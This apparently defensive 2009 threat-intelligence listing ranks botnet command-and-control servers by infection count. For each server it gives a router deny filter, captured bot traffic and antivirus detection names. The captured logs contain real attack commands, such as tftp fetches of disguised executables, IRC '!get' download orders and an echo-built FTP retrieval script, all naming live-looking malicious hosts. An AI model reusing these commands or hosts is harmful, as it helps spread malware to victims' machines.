Download our list of the most observed botnet command and control server IP addresses.

Most Prolific BotNet Command and Control Servers and Filters

Fri Nov 6 08:34:01 2009

Priority 100	TCP Ports 80 80 218 80 114 80 91	Filter deny ip host 213.219.245.212 any log ! 464 infects 06/09/09 to 11/05/09 eastweb.ru	ISP hosting and colocation services
Clients 464	russian federation	Activity	Domain eastweb.ru

Chatter Example

Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 87.250.57.232:8138
Server: GET /index.php?id=txphhhxqqjawgik&scn=0&inf=0&ver=20&cnt=USA...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	Korgo.9359.B
AntiVir	Korgo.X
Authentium	Korgo.W
Avast	_Korgo-T
AVG	Padobot.W
BitDefender	Korgo.W
CAT-QuickHeal	Korgo.X
ClamAV	Korgo.Y
DrWeb	Lsabot
eSafe	Padobot.gen
eTrust-Vet	Korgo.AB
Ewido	Dropper.Paradrop.a
FileAdvisor	MISSED
Fortinet	Korgo.K!worm
F-Prot	Korgo.W
F-Secure	Padobot.gen
Ikarus	Korgo.K
Kaspersky	Padobot.gen
McAfee	Korgo.ab
Microsoft	Korgo.AB
NOD32v2	Korgo.Y
Norman	Korgo.Y
Panda	Korgo.AY.worm
Prevx1	KORGO.W
Rising	Korgo.x
Sophos	Korgo-K
Sunbelt	MISSED
Symantec	Korgo.X
TheHacker	Korgo(2).gen.pack
TrendMicro	MISSED
VBA32	Padobot.gen
VirusBuster	Korgo.AB
Webwasher Gateway	Korgo.X

Priority 100	TCP Ports 2081 9890 9890 66 2010 9890 216	Filter deny ip host 66.252.13.214 any log ! 252 infects 05/10/09 to 11/03/09 louisianadynamics.com	ISP gigenet
Clients 252	united states	Activity	Domain louisianadynamics.com

Chatter Example

Client: USER a
Client: PASS a
Server: RETR Win15763.exe
Client: NICK F-olmgmodqUSER F-olmgmodq 0 0 :F-olmgmodq
Server: :211.cpe.netcabo.uk NOTICE AUTH :*** Looking up your...
Client: JOIN ##S## J
Server: :F-olmgmodq!F-olmgmodq@192.168.1.172 JOIN...
Client: USERHOST F-olmgmodqJOIN ##S## JUSERHOST F-olmgmodqJOIN ##S##...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	IRCBot.variant
AntiVir	TRCrypt.TPM.Gen
Authentium	Heuristic-210!Eldorado
Avast	MISSED
AVG	RBot.DN
BitDefender	MemScan_Backdoor.RBot.XYL
CAT-QuickHeal	Black.a
ClamAV	Packed-142
DrWeb	Packed.650
eSafe	MISSED
eTrust-Vet	ForBot.WP
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	Packed.2D18!tr
F-Prot	Heuristic-210!Eldorado
F-Secure	Kolab.arp
Ikarus	Kolab
Kaspersky	Kolab.arp
McAfee	MISSED
Microsoft	Wootbot.gen
NOD32v2	MISSED
Norman	Malware.DQWL
Panda	MISSED
Prevx1	MISSED
Rising	Undef.blt
Sophos	MalGeneric-A
Sunbelt	Kolab.arp
Symantec	Spybot.Worm
TheHacker	Behav-Heuristic-064
TrendMicro	BKDR_SDBOT.FOG
VBA32	Wootbot
VirusBuster	Agobot.WPUZ
Webwasher Gateway	MISSED

Priority 72	TCP Ports 65520 65520 85 65520 218 65520 69	Filter deny ip host 221.5.74.39 any log ! 70 infects 06/25/09 to 08/17/09 cncnet.net	ISP china unicom guangdong province network
Clients 70	china	Activity	Domain cncnet.net

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 114.207.40.33 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 114.207.40.33 get dllhost.exe wins\\DLLHOST.EXE
Client: NICK pxlisrppUSER l020501 . . :-
Client: JOIN &virtu
Server: :u. PRIVMSG pxlisrpp :!get...
Client: GET /EvID4226Patch.exe HTTP/1.0User-Agent: DownloadHost:...
Server: GET /gc.exe HTTP/1.0User-Agent: DownloadHost: put.ghura.plPragma:...
Server: GET...
Server: GET...
Server: GET /gt_ky.php HTTP/1.0User-Agent: Windows 5.1 (2600); DMCP ver...
Server: GET /get_93.php?p=152 HTTP/1.0User-Agent: Windows 5.1 (2600);...
Server: GET...
Server: PONG :j.
Client: JOIN &virtu
Server: PONG :j.
Client: JOIN &virtu
Server: PONG :j.
Client: JOIN &virtu
Server: PONG :j.
Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	TRDownloader.Gen
Authentium	Downloader.F.gen!Eldorado
Avast	MISSED
AVG	Downloader.Generic8.BFCH
BitDefender	MISSED
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	DownLoader.origin
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	PossibleThreat
F-Prot	Downloader.F.gen!Eldorado
F-Secure	Suspicious_Malware!Gemini
Ikarus	Zlob
Kaspersky	MISSED
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	DLoader.KZPW
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MalGeneric-A
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
TrendMicro	PAK_Generic.001
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED

Priority 71	TCP Ports 65520 65520 216 65520 85 65520 221	Filter deny ip host 218.93.205.24 any log ! 69 infects 06/26/09 to 08/14/09 163data.com.cn	ISP chinanet jiangsu province network
Clients 69	china	Activity	Domain 163data.com.cn

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 116.120.239.76 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 116.120.239.76 get dllhost.exe wins\\DLLHOST.EXE
Client: NICK ioroihzmUSER b020501 . . :-
Server: NICK ioroihzmUSER b020501 . . :-JOIN &virtu
Server: :u. PRIVMSG ioroihzm :!get http:/www.zief.pl/gc.exe:u. PRIVMSG...
Client: GET /gc.exe HTTP/1.0User-Agent: DownloadHost: www.zief.plPragma:...
Server: GET...
Server: GET...
Server: GET /gt_ky.php HTTP/1.0User-Agent: Windows 5.1 (2600); DMCP ver...
Server: PONG :i.
Client: JOIN &virtu
Server: PONG :i.
Client: JOIN &virtu
Client: JOIN &virtu
Server: PONG :i.
Client: JOIN &virtu
Server: GET /get_93.php?p=155 HTTP/1.0User-Agent: Windows 5.1 (2600);...
Server: GET...
Server: PONG :i.
Client: JOIN &virtu
Server: PONG :i.
Client: JOIN &virtu
Server: PONG :i.
Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	MISSED
Authentium	MISSED
Avast	MISSED
AVG	MISSED
BitDefender	MISSED
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	MISSED
Ikarus	MISSED
Kaspersky	MISSED
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MISSED
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
TrendMicro	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED

Priority 65	TCP Ports 3305	Filter deny ip host 61.120.62.28 any log ! 63 infects 05/22/09 to 08/22/09 dion.ne.jp	ISP rabby_s inc
Clients 63	japan	Activity	Domain dion.ne.jp

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 204.116.1.238 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 204.116.1.238 get dllhost.exe wins\\DLLHOST.EXE
Client: PASS secretpass
Client: NICK P|bn0tpy3sxUSER w1m95y9mp * 0 :USA|2K|378
Server: :hub.63631.net 001 P|bn0tpy3sx...
Client: USERHOST P|bn0tpy3sx
Client: USERHOST P|bn0tpy3sxMODE P|bn0tpy3sx JOIN #mm RSA
Server: :hub.63631.net 302 P|bn0tpy3sx...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	Virut.B
AntiVir	Virut.AX
Authentium	Virut.7116
Avast	_Virtob
AVG	Virut
BitDefender	Virtob.8.Gen
CAT-QuickHeal	Virut.Z
ClamAV	Virut-17
DrWeb	Virut.30
eSafe	MISSED
eTrust-Vet	Virut.7115
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	Virut.AV
F-Prot	Virut.7116
F-Secure	Virut.av
Ikarus	Kolabc
Kaspersky	Virut.av
McAfee	Virut.gen.a
Microsoft	Virut.AC
NOD32v2	MISSED
Norman	Virut.AG
Panda	Virutas.FG
Prevx1	MISSED
Rising	Virut.an
Sophos	Virut-W
Sunbelt	MISSED
Symantec	Virut.W
TheHacker	Virut.av
TrendMicro	PE_VIRUT.AV
VBA32	Virut.2
VirusBuster	Virut.Gen.4
Webwasher Gateway	MISSED

Priority 62	TCP Ports 65520 65520 91 65520 213	Filter deny ip host 218.93.205.30 any log ! 60 infects 09/09/09 to 11/05/09 163data.com.cn	ISP chinanet jiangsu province network
Clients 60	china	Activity	Domain 163data.com.cn

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 211.187.180.91 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 211.187.180.91 get dllhost.exe wins\\DLLHOST.EXE
Client: NICK gulajgolUSER q020500 . . :_
Client: Service Pack 2JOIN &virtu
Server: :i. PRIVMSG gulajgol :!get http:/gidromash.cn/oc/box.txt
Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
Server: GET /lib/ssv.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
Server: GET /svc.php?file=isvchost.exe HTTP/1.0Accept: */*User-Agent:...
Server: GET /svc.php?file=svchost.exe HTTP/1.0Accept: */*User-Agent:...
Server: PONG :i.
Client: JOIN &virtu
Server: GET /svc.php?file=svchust.exe HTTP/1.0Accept: */*User-Agent:...
Server: GET...
Server: GET...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	Virut
AntiVir	Virut.A
Authentium	Virut.4960
Avast	_Nachi
AVG	Virut.A
BitDefender	Welchia.A
CAT-QuickHeal	Virut.A
ClamAV	Virut.A
DrWeb	Virut
eSafe	Virut.a
eTrust-Vet	Virut.5127
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	Virut.A
F-Prot	Virut.4960
F-Secure	Virut.a
Ikarus	Virut.a
Kaspersky	Virut.a
McAfee	Virut.a
Microsoft	MISSED
NOD32v2	Virut.5127
Norman	Virut.A
Panda	Virutas.B
Prevx1	MISSED
Rising	Virut.az
Sophos	Virut-T
Sunbelt	MISSED
Symantec	Virut.A
TheHacker	Virut.gen
TrendMicro	PE_VIRUT.A
VBA32	Virut.A
VirusBuster	Nachi
Webwasher Gateway	Virut.A

Priority 48	TCP Ports 3305	Filter deny ip host 92.240.234.164 any log ! 47 infects 09/07/09 to 11/02/09 lightstorm.sk	ISP lightstorm communications s.r.o
Clients 47	slovakia	Activity	Domain lightstorm.sk

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 211.20.222.150 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 211.20.222.150 get dllhost.exe wins\\DLLHOST.EXE
Client: PASS secretpass
Client: NICK P|mzlofyw7bUSER hpgbpr6lj * 0 :USA|2K|669
Server: :hub.2702.net 001 P|mzlofyw7b...
Client: USERHOST P|mzlofyw7b
Server: :hub.2702.net 302 P|mzlofyw7b...
Client: USERHOST P|mzlofyw7bMODE P|mzlofyw7b JOIN #mm RSA
Client: PRIVMSG #mm...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	IRCBot.Gen
AntiVir	TRATRAPS.Gen
Authentium	MISSED
Avast	_DCom-F
AVG	SHeur2.AOLW
BitDefender	Generic.Mydoom.F72197F1
CAT-QuickHeal	Agent.gen
ClamAV	MISSED
DrWeb	HLLW.Piabot.origin
eSafe	MISSED
eTrust-Vet	IRCBot.PJ
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	Kolabc.gza
Ikarus	Exploit.MS06040
Kaspersky	Kolabc.gza
McAfee	Spybot.worm!l
Microsoft	Exploit_MS06040.gen
NOD32v2	MISSED
Norman	Atraps.MQB
Panda	TrjCI.A
Prevx1	MISSED
Rising	MISSED
Sophos	MalBehav-004
Sunbelt	MISSED
Symantec	Spybot.Worm
TheHacker	MISSED
TrendMicro	SPYBOT.BIM
VBA32	MISSED
VirusBuster	RBot.Gen.3
Webwasher Gateway	MISSED

Priority 48	TCP Ports 65520 65520 218	Filter deny ip host 91.212.220.75 any log ! 47 infects 09/11/09 to 10/30/09 -	ISP group vertical ltd
Clients 47	russian federation	Activity	Domain -

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 116.126.26.100 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 116.126.26.100 get dllhost.exe wins\\DLLHOST.EXE
Client: NICK xdsexzfyUSER k020500 . . :-
Client: Service Pack 2JOIN &virtu
Server: :k. PRIVMSG xdsexzfy :!get http:/gidromash.cn/oc/box.txt
Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
Server: GET /lib/ssv.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
Server: PONG :k.
Client: JOIN &virtu
Server: PONG :k.
Client: JOIN &virtu
Server: PONG :k.
Client: JOIN &virtu
Server: PONG :k.
Client: JOIN &virtu
Server: PONG :k.
Client: JOIN &virtu
Server: PONG :k.
Client: JOIN &virtu
Server: PONG :k.
Client: JOIN &virtu
Server: PONG :k.
Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	MISSED
Authentium	MISSED
Avast	MISSED
AVG	MISSED
BitDefender	MISSED
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	DownLoad.47549
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	Suspicious_Malware!Gemini
Ikarus	MISSED
Kaspersky	MISSED
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MISSED
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
TrendMicro	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED

Priority 35	TCP Ports 65520 121 65520 69	Filter deny ip host 114.80.101.21 any log ! 34 infects 05/30/09 to 06/25/09 online.sh.cn	ISP chinanet shanghai province network
Clients 34	china	Activity	Domain online.sh.cn

Chatter Example

Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host:...
Client: NICK ricrsscdUSER d020501 . . :-
Client: JOIN &virtu
Server: :u. PRIVMSG ricrsscd :!get http:/brenz.pl/ex/a.php
Server: GET /ex/a.php HTTP/1.0User-Agent: DownloadHost: brenz.plPragma:...
Server: GET /mega/lgate.php?n=94AEEEDFFCB64848 HTTP/1.0Accept:...
Server: GET /stx9/fout.php HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
Server: GET /dll/mr.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
Server: PONG :l.
Client: JOIN &virtu
Server: NICK tpiyrtkgUSER j020501 . . :-
Client: JOIN &virtu
Server: :u. PRIVMSG tpiyrtkg :!get...
Server: GET /ex/a.php HTTP/1.0User-Agent: DownloadHost: brenz.plPragma:...
Server: GET /mega/lgate.php?n=94AEEEDFFCB64848 HTTP/1.0Accept:...
Server: GET /dll/mr.txt HTTP/1.0Accept: */*If-Modified-Since: Thu, 18 Jun...
Server: PONG :m.
Client: JOIN &virtu
Server: PONG :m.
Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	TRCrypt.XPACK.Gen
Authentium	MISSED
Avast	MISSED
AVG	Generic13.BEHA
BitDefender	BehavesLike_ExplorerHijack
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	Inject.5822
eSafe	TRCrypt.XPACK
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	Malware
Ikarus	Trojan-Downloader.Obitel
Kaspersky	Agent2.kov
McAfee	MISSED
Microsoft	TrojanDownloader_Obitel.gen!C
NOD32v2	MISSED
Norman	Malware
Panda	MISSED
Prevx1	MISSED
Rising	DL.Undef.euc
Sophos	MalGeneric-A
Sunbelt	MISSED
Symantec	Downloader
TheHacker	MISSED
TrendMicro	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED

Priority 32	TCP Ports 65520 65520 213	Filter deny ip host 121.12.116.142 any log ! 31 infects 05/13/09 to 06/25/09 163data.com.cn	ISP chinanet guangdong province network
Clients 31	china	Activity	Domain 163data.com.cn

Chatter Example

Server: echo off&echo open 79.163.203.154 1023>>cmd.ftp&echo...
Client: USER anonymous
Client: PASS bin
Server: RETR 23902_upload.exe
Client: NICK ttcaruuwUSER e020501 . . :-
Client: JOIN &virtu
Server: :m. PRIVMSG ttcaruuw :!get http:/goasi.cn/ex/a.php
Server: :u. PRIVMSG ttcaruuw :!get...
Server: PONG :m.
Client: JOIN &virtu
Server: NICK srupkfvhUSER n020501 . . :-
Client: JOIN &virtu
Server: :m. PRIVMSG srupkfvh :!get http:/goasi.cn/ex/a.php
Server: :u. PRIVMSG srupkfvh :!get...
Client: GET /ex/a.php HTTP/1.0User-Agent: DownloadHost: goasi.cnPragma:...
Server: GET /files/adx.gif HTTP/1.0User-Agent: DownloadHost:...
Server: GET /cw.exe HTTP/1.0User-Agent: DownloadHost:...
Server: PONG :m.
Client: JOIN &virtu
Server: PONG :m.
Client: JOIN &virtu
Server: GET /mega/lgate.php?n=94AEEEDFFCB64848 HTTP/1.0Accept:...
Server: GET /dll/abb.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
Server: GET / HTTP/1.0Host: www.google.comUser-Agent: Mozilla/4.0...
Client: POST /achcheck.php HTTP/1.0Host: upr15may.comUser-Agent:...
Client: POST /ld/gen.php HTTP/1.0Host: upr15may.comUser-Agent:...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	TRCrypt.XPACK.Gen
Authentium	MISSED
Avast	MISSED
AVG	Generic13.BEHA
BitDefender	BehavesLike_ExplorerHijack
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	Inject.5822
eSafe	TRCrypt.XPACK
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	Malware
Ikarus	Trojan-Downloader.Obitel
Kaspersky	Agent2.kov
McAfee	MISSED
Microsoft	TrojanDownloader_Obitel.gen!C
NOD32v2	MISSED
Norman	Malware
Panda	MISSED
Prevx1	MISSED
Rising	DL.Undef.euc
Sophos	MalGeneric-A
Sunbelt	MISSED
Symantec	Downloader
TheHacker	MISSED
TrendMicro	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED

Priority 30	TCP Ports 16667	Filter deny ip host 66.252.13.212 any log ! 29 infects 05/22/09 to 11/03/09 louisianadynamics.com	ISP gigenet
Clients 29	united states	Activity	Domain louisianadynamics.com

Chatter Example

Client: USER 1
Server: 331 Password required
Client: PASS 1
Server: 230 User logged in.
Server: RETR Tracker.exe
Server: 150 Opening BINARY mode data connection
Server: 221 Goodbye happy r00ting.
Client: NICK [USA]2K-SP2[00]8493USER ygaci 0 0...
Server: NICK [USA]2K-SP2[00]6761USER jutcf 0 0...
Server: :mi67.three.co.lt NOTICE AUTH :*** Looking up your...
Client: USERHOST [USA]2K-SP2[00]6761
Client: MODE [USA]2K-SP2[00]6761 -x+iJOIN #l# lamUSERHOST...
Server: PONG :mi67.three.co.lt
Client: JOIN #l# lam
Server: PONG :mi67.three.co.lt
Client: JOIN #l# lam
Server: NICK [USA]2K-SP2[00]0046USER etbtll 0 0...
Server: :mi67.three.co.lt NOTICE AUTH :*** Looking up your hostname...
Server: :mi67.three.co.lt NOTICE AUTH :*** Couldn\\'t resolve your...
Server: PONG :mi67.three.co.ltJOIN #l# lam
Client: USERHOST [USA]2K-SP2[00]0046
Client: MODE [USA]2K-SP2[00]0046 -x+iJOIN #l# lamUSERHOST...
Server: PONG :mi67.three.co.ltJOIN #l# lam
Server: PONG :mi67.three.co.ltJOIN #l# lam
Server: PONG :mi67.three.co.ltJOIN #l# lam
Server: PONG :mi67.three.co.ltJOIN #l# lam

more....

BotClient Antivirus Diagnoses

AhnLab-V3	Virut.B
AntiVir	Virut.AX
Authentium	Backdoor2.DKQM
Avast	_Virtob
AVG	Virut
BitDefender	Generic.127971
CAT-QuickHeal	Virut.Z
ClamAV	Virut-54
DrWeb	HLLW.MyBot
eSafe	MISSED
eTrust-Vet	Virut.7115
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	Virut.AV
F-Prot	Backdoor2.DKQM
F-Secure	Virut.av
Ikarus	VirTool.DelfInject
Kaspersky	Virut.av
McAfee	Virut.gen.a
Microsoft	Virut.AC
NOD32v2	MISSED
Norman	Agent.LSMS
Panda	Virutas.FG
Prevx1	MISSED
Rising	Mnless.akf
Sophos	Virut-W
Sunbelt	MISSED
Symantec	Virut.W
TheHacker	Virut.av
TrendMicro	PE_VIRUT.AV
VBA32	Virut.2
VirusBuster	Virut.Gen.4
Webwasher Gateway	MISSED

Priority 22	TCP Ports 7000	Filter deny ip host 87.118.98.185 any log ! 22 infects 09/01/09 to 09/04/09 keymachine.de	ISP keyweb ag ip network
Clients 22	germany	Activity	Domain keymachine.de

Chatter Example

Client: USER 1
Server: 331 Password required
Client: PASS 1
Server: 230 User logged in.
Server: RETR coder.exe
Server: 150 Opening BINARY mode data connection
Server: 221 Goodbye happy r00ting.
Client: NICK USA|00|XP|SP0|0204612USER wxvkwzjqc 0 0...
Server: :irc.oc256.com NOTICE AUTH :*** Looking up your...
Server: :irc.oc256.com NOTICE USA|00|XP|SP0|0204612 :*** If you are...
Server: PONG :DD5EF013
Client: JOIN ##nzm##
Client: USERHOST USA|00|XP|SP0|0204612MODE USA|00|XP|SP0|0204612 -x+iJOIN...
Client: PRIVMSG ##nzm## :\\002n\\002z\\037m\\037 (root.p\\037l\\037g)...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	Win-Agent.20480.AJY
AntiVir	TRDropper.Gen
Authentium	MISSED
Avast	MISSED
AVG	Dropper.Generic.AVFT
BitDefender	MISSED
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	Poison.767
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	MISSED
Ikarus	Trojan-Ransom
Kaspersky	Trojan-Ransom.SMSer.in
McAfee	MISSED
Microsoft	VirTool_Injector.gen!Y
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MISSED
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
TrendMicro	MISSED
VBA32	Rbot.afvq
VirusBuster	MISSED
Webwasher Gateway	MISSED

Priority 21	TCP Ports 8080 72 10324 10324 72 10324 83	Filter deny ip host 67.43.236.66 any log ! 21 infects 06/09/09 to 10/02/09 -	ISP nader dara
Clients 21	lebanon	Activity	Domain -

Chatter Example

Client: USER 1
Client: PASS 1
Server: RETR Cilevb.com
Client: USER hfmgaw hfmgaw hfmgaw :cqzxfgrdrxjyjwhj
Client: NICK mrouBtig
Client: MODE mrouBtig +xi
Client: GET /gg2.exe HTTP/1.0Host: zone2tech.info
Server: GET /wsws.exe HTTP/1.0Host: zone2tech.info
Client: JOIN #las6 USERHOST mrouBtigMODE #m +smntu
Server: :mrouBtig!hfmgaw@192.168.1.144 JOIN :#las6:hub.58784.com 353...
Client: MODE #las6 +smntu
Server: :hub.58784.com 482 mrouBtig #las6 :You\\'re not channel operator

more....

BotClient Antivirus Diagnoses

AhnLab-V3	Virut.B
AntiVir	Virut.AX
Authentium	Virut.7116
Avast	_Virtob
AVG	RBot.KB
BitDefender	Bot.95191
CAT-QuickHeal	Virut.Z
ClamAV	Virut-54
DrWeb	IRC.Sdbot.2665
eSafe	TRCrypt.nspm
eTrust-Vet	Virut.7115
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	Virut.AV
F-Prot	Virut.7116
F-Secure	Nepoe.em
Ikarus	Crypt.NSPM
Kaspersky	MISSED
McAfee	Virut.gen.a
Microsoft	Virut.AC
NOD32v2	MISSED
Norman	Virut.AG
Panda	Virutas.FG
Prevx1	MISSED
Rising	Virut.an
Sophos	Virut-W
Sunbelt	MISSED
Symantec	Virut.W
TheHacker	Virut.av
TrendMicro	PE_VIRUT.AV
VBA32	Nepoe.em
VirusBuster	PoeBot.OB
Webwasher Gateway	MISSED

Priority 18	TCP Ports 6669	Filter deny ip host 89.138.22.15 any log ! 18 infects 07/09/09 to 07/09/09 netvision.net.il	ISP bb-hfa
Clients 18	israel	Activity	Domain netvision.net.il

Chatter Example

Client: NICK USA|XP|SP0|00|7724USER pvser 0 0 :\\002\\0034CodeD \\0038By...
Server: :fart.bitchassness.shit NOTICE USA|XP|SP0|00|7724 :*** If you are...
Server: PONG :9BB24218
Client: JOIN ##!X5 whores
Client: USERHOST USA|XP|SP0|00|7724
Client: MODE USA|XP|SP0|00|7724 -x+iJOIN ##!X5 whoresUSERHOST...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	MISSED
Authentium	MISSED
Avast	MISSED
AVG	MISSED
BitDefender	MISSED
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	MISSED
Ikarus	MISSED
Kaspersky	MISSED
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MISSED
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
TrendMicro	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED

Priority 17	TCP Ports 6900	Filter deny ip host 78.155.216.238 any log ! 17 infects 09/29/09 to 09/30/09 -	ISP mostelecom-customer
Clients 17	russian federation	Activity	Domain -

Chatter Example

Client: USER 1
Server: 331 Password required
Client: PASS 1
Server: 230 User logged in.
Server: RETR utilmgr.exe
Server: 150 Opening BINARY mode data connection
Server: 221 Goodbye happy r00ting.
Client: NICK Gleason211USER xaqrn 0 0 :Gleason211
Server: :fart.bitchassness.shit NOTICE Gleason211 :*** If you are having...
Server: PONG :4FE4D7D7
Client: JOIN ##!X4
Client: USERHOST Gleason211MODE Gleason211 -x+iJOIN ##!X4 USERHOST...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	MISSED
Authentium	MISSED
Avast	MISSED
AVG	IRCBackDoor.SdBot4.NNI
BitDefender	MISSED
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	Kolab.eay
Ikarus	Kolab
Kaspersky	Kolab.eay
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MalGeneric-A
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
TrendMicro	KOLAB.DW
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED

Priority 15	TCP Ports 10324	Filter deny ip host 67.43.236.67 any log ! 15 infects 07/23/09 to 09/19/09 -	ISP nader dara
Clients 15	lebanon	Activity	Domain -

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 67.123.204.202 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 67.123.204.202 get dllhost.exe wins\\DLLHOST.EXE
Client: USER xeodwo xeodwo xeodwo :pkjzcuvgmdbgctxb
Client: NICK BWeBcttR
Client: MODE BWeBcttR +xi
Client: GET /rs3.exe HTTP/1.0Host: nadsamcabran12.com
Client: JOIN #last USERHOST BWeBcttRMODE #m +smntuPRIVMSG #m...
Client: MODE #last +smntu
Server: :hub.20582.com 482 BWeBcttR #last :You\\'re not channel operator

more....

BotClient Antivirus Diagnoses

AhnLab-V3	IRCBot.variant
AntiVir	Rbot.cyj
Authentium	Backdoor2.EVZY
Avast	MISSED
AVG	Generic11.ABKQ
BitDefender	IRCBot.ACTA
CAT-QuickHeal	VanBot.bdt
ClamAV	MISSED
DrWeb	MISSED
eSafe	IRCBot
eTrust-Vet	Slenfbot!generic
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	PossibleThreat
F-Prot	Backdoor2.EVZY
F-Secure	VanBot.bdt
Ikarus	VanBot
Kaspersky	VanBot.bdt
McAfee	Nirbot.worm!a
Microsoft	VirTool_DelfInject.gen!AW
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	Delf.efj
Sophos	MalGeneric-A
Sunbelt	MISSED
Symantec	IRCBot
TheHacker	MISSED
TrendMicro	BKDR_VANBOT.RG
VBA32	Autorun.xdfc
VirusBuster	VanBot.BBW
Webwasher Gateway	MISSED

Priority 13	TCP Ports 6669	Filter deny ip host 190.12.5.5 any log ! 13 infects 07/11/09 to 07/12/09 corp-190-12-4-10-cue.puntonet.ec	ISP puntonet s.a
